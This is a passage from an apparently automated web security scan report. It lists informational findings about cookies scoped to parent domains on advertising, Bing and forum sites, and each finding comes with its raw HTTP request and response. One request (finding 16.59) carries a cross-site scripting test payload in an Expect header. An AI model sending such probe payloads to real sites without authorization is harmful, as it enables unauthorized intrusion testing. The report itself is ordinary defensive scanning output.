Set-Cookie: bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9L1tDQzsBL8nC9M+/p1TuHsq0uTLp1sCq9HDpkeYzR9YJ1ROJE+foJGy1IAQ0EYQ0+I6x1LyG1rft/cRJP9hYLFcVpsPASc5QRWiE3sH/9Rr2zWYT9aUZJjv1QHwWw0OfrO7R7OcItxF6syBFJz1njoeqag+O2eOP1M999Jbv/oA=; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 01:58:50 GMT; path=/; domain=.bluekai.com
BK-Server: c45a
Content-Length: 997
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ad.yieldmanager.com/pixel?id=1182722&id=1182795&id=1182798&id=1182799&id=1182843&t=2" width=1 height=1 border=0 alt="">
<img src="h
...[SNIP]...

16.49. http://um.simpli.fi/ab_match

Summary

Severity:   Information
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /ab_match

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ab_match HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: um.simpli.fi

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Mon, 02 May 2011 02:09:12 GMT
Content-Type: text/html
Connection: close
Set-Cookie: uid=G2tSSfsD3T9Q3E3BUMibCF%3D%3D; domain=.simpli.fi; path=/; expires=Tue, 01-May-2012 02:09:12 GMT
P3P: policyref="http://www.simplifi.com/w3c/Policies.xml", CP="ADMa DEVa PSAa PSDa OUR IND DSP NON COR"
Location: http://ads.adbrite.com/adserver/vdi/762701?d=49526B1B3FDD03FBC14DDC50089BC850
Content-Length: 0


16.50. http://user.lucidmedia.com/clicksense/user

Summary

Severity:   Information
Confidence:   Certain
Host:   http://user.lucidmedia.com
Path:   /clicksense/user

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/user?p=88436487f575811a&r=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: user.lucidmedia.com

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: private
P3P: CP=NOI ADM DEV CUR
Date: Mon, 02 May 2011 02:35:25 GMT
Expires: Mon, 02 May 2011 02:35:26 GMT
Set-Cookie: 2=2yiXqyLLXLn; Domain=.lucidmedia.com; Expires=Tue, 01-May-2012 02:35:26 GMT; Path=/
Location: http://ads.adbrite.com/adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D
Content-Length: 0
Connection: close


16.51. http://va.px.invitemedia.com/goog_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /goog_imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goog_imp?returnType=image&key=AdImp&cost=Tb4RXwAHNm8K5ovHrlhLb5hGYOYV9br2QoBlYA&creativeID=110455&message=eJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3&managed=false HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB; partnerUID="eyI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXSwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:23:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 02:23:11 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Set-Cookie: impressions="{\"591275\": [1304303011+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuF49ZlFgEli8eofb1kUGDVW7wTSBkwWG29/ecvCJcKxYj6rAKPE5L7TQFkGDQYDBgsGoOjO+8xA0Vnz1yJEAeCpF3s="; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Set-Cookie: segments_p1="eJzjYuZojOBi4Wj6zwQkm8FkZwczFzPHRBUgMd0YyJ/5AyQ6B0zOBZLMHAuCgcy1+xmB5PoPjECBjcVA5o5djFxcHDv3MQvMOjjnHQtQeL8fUPhgN0jdoSMgjUdzgMyTYDNO5wCJcyD+he8gky/uBZFPLoCM+xcOIjgACq4pOw=="; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjkuY4HijAJLF49Y+3LAqMGvdBtAGTxcbbX96ycAlzbAsVYJSY3HcaKMmgwWDAYMEAFNzrAhScNX8tQhAAe68V+g=="; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

16.52. http://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.24-7pressrelease.com
Path:   /press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php HTTP/1.1
Host: www.24-7pressrelease.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:39 GMT
Server: Apache
Vary: User-Agent
Set-Cookie: tf7sid=a9l3d80hrmsh2jf67cj61qtuj2; path=/; domain=.24-7pressrelease.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 37188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Press Release - The
...[SNIP]...

16.53. http://www.bing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=I=1&TS=1304292748

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:30 GMT
Connection: close
Set-Cookie: _HOP=; domain=.bing.com; path=/
Set-Cookie: _SS=SID=54196B2489E649DC9D985351F7EDDDA0; domain=.bing.com; path=/
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF; expires=Tue, 30-Apr-2013 23:32:30 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; expires=Tue, 30-Apr-2013 23:32:30 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:30 GMT; domain=.bing.com; path=/
Content-Length: 29385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" ><head><me
...[SNIP]...

16.54. http://www.bing.com/HPImageArchive.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /HPImageArchive.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /HPImageArchive.aspx?format=xml&idx=0&n=1&nc=1304310754936 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; RMS=F=GgAg&A=AAAAAAAAAAAQ; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903&bIm=926; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF&TUID=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2483
Content-Type: text/xml; charset=utf-8
Date: Sun, 01 May 2011 23:32:36 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:36 GMT; domain=.bing.com; path=/

<?xml version="1.0" encoding="utf-8" ?><images><image><startdate>20110501</startdate><fullstartdate>201105010700</fullstartdate><enddate>20110502</enddate><url>/fd/hpk2/EmpireState_EN-US1121929261.jpg
...[SNIP]...

16.55. http://www.bing.com/fd/fb/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/fb/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/fb/r?v=7_04_0_906814&sId=0 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FBB=R=0; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; RMS=F=GgAg

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=15552000
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:32 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:32 GMT; domain=.bing.com; path=/
Content-Length: 2125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; char
...[SNIP]...

16.56. http://www.bing.com/fd/fb/u

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/fb/u

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/fb/u?v=7_04_0_906814&sId=0 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_906814&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FBB=R=0; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; RMS=F=GgAg&A=AAAAAAAAAAAQ; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903&bIm=926; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF&TUID=1

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=15552000
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:36 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:35 GMT; domain=.bing.com; path=/
Content-Length: 2611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; char
...[SNIP]...

16.57. http://www.bing.com/fd/ls/l

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/l

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/ls/l?IG=2d5571d309564964970af86c3c5fef46&PM=Y&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22PC%22:4,%22FC%22:-1,%22BC%22:4,%22BS%22:12,%22H%22:15,%22FE%22:-1,%22LE%22:-1,%22C1%22:-1,%22C2%22:-1,%22BP%22:134,%22KP%22:-1,%22CT%22:139,%22IL%22:0}}&P=SERP&DA=Bl2 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Sun, 01 May 2011 23:32:31 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:30 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

16.58. http://www.bing.com/scopePopupHandler.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /scopePopupHandler.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scopePopupHandler.aspx?IID=SERP.1000&IG=2d5571d309564964970af86c3c5fef46&PM=Y HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; RMS=F=CgAg

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:34 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:33 GMT; domain=.bing.com; path=/
Content-Length: 4593

<div class="sc_pc" id="images"><ul class="sc_hl1"><li><a href="/images/search?q=wallpaper+filterui%3aimagesize-desktop_w_1024+filterui%3aimagesize-desktop_h_768&amp;qpvt=wallpaper" onmousedown="return
...[SNIP]...

16.59. http://www.dirtrider.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dirtrider.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dirtrider.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=egt43x45tiwnren54mtoic55; path=/; HttpOnly
Set-Cookie: UserPuid=2331437118715581986; domain=dirtrider.com; expires=Mon, 02-May-2061 00:20:09 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 43

GIF89a.......|.8...!.......,...........D..;

16.60. http://www.greenhulk.net/forums/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/login.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /forums/login.php?do=login HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
Cache-Control: max-age=0
Origin: http://www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gh_lastactivity=0; __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.2.10.1304319910
Content-Length: 222

vb_login_username=User+Name&vb_login_password_hint=Password&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:42 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:30:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...

16.61. http://www.greenhulk.net/forums/register.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/register.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/register.php HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
